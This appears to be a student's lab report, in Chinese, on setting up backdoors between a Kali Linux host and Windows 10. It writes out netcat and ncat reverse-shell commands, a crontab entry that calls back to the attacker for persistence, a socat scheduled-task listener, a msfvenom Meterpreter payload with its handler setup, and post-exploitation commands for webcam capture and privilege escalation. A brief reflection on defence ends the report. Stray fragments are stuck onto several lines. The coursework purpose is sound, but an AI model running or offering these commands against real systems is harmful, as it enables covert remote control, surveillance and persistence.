Kali地址:192.168.153.134
linux
Win10地址:169.254.0.178
web
保證能ping通:
shell
關閉防火牆和殺毒軟件vim
ncat.exe -l -p 5237
nc 192.168.153.134 -e /bin/sh
反彈鏈接Windows主機的 5237 端口windows
攻擊成功:Win10成功得到Kali操做shell,可以進行操做
安全
相同道理:在Linux中監聽5237端口網絡
在Windows輸入指令tcp
ncat.exe -e cmd.exe 192.168.153.134 5237
反彈鏈接Linux的5237端口編輯器
cron是linux下用來週期性的執行某種任務或等待處理某些事件的一個守護進程,與windows下的計劃任務相似,當安裝完成操做系統後,默認會安裝此服務 工具,而且會自動啓動cron進程,cron進程每分鐘會按期檢查是否有要執行的任務,若是有要執行的任務,則自動執行該任務。工具
用 crontab -e 指令編輯定時任務,選擇3
vim編輯器中用 i 改成插入模式,在最後一行插入 50 19 23 3 * /bin/netcat 192.168.153.134 5237 -e /bin/sh 後輸入 :wq! 保存並退出
成功顯示ls:
建立新任務,填寫任務名稱,新建一個觸發器。
同時建立新操做,在操做->程序或腳本中選擇 socat.exe 文件的路徑,在添加參數一欄填寫 tcp-listen:5237 exec:cmd.exe,pty,stderr
按快捷鍵win+L即能鎖定計算機,建立的任務開始運行。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=5237 -f exe > 20165237.exe
use exploit/multi/handler /*進入handler模式*/ set payload windows/meterpreter/reverse_tcp /*對應生成的後門程序設置payload*/ show options /*查看當前信息狀態*/ set LHOST 192.168.153.134 /*設置LHOST,其中ip爲Linux的ip*/ set LPORT 5237 /*設置LPORT*/ exploit /*啓動監聽*/
webcam_snap / webcam_stream
getuid get system
感想:此次實驗,不得不說很讓我震驚。這是我第一次實際上get到後門獲取信息的知識,很知足。但願之後可以更深刻的學到相關理論和知識,不只學會攻擊,也要學會防範。
例舉你能想到的一個後門進入到你係統中的可能方式?
答:
答:在下載軟件的時候,可能會有捆綁垃圾下載下來,而後修改開機的啓動項,當攻擊者輸入命令時,本機可能會自動響應。
答:我以爲最深入的就是錄像和音頻的獲取(這不就是黑客監視麼!!)我已經將筆記本的攝像頭貼起來了。
答:360安全衛士或許是個很好的選擇;不過若是真正想要發現後門程序,我以爲要用抓包技術來分析信息。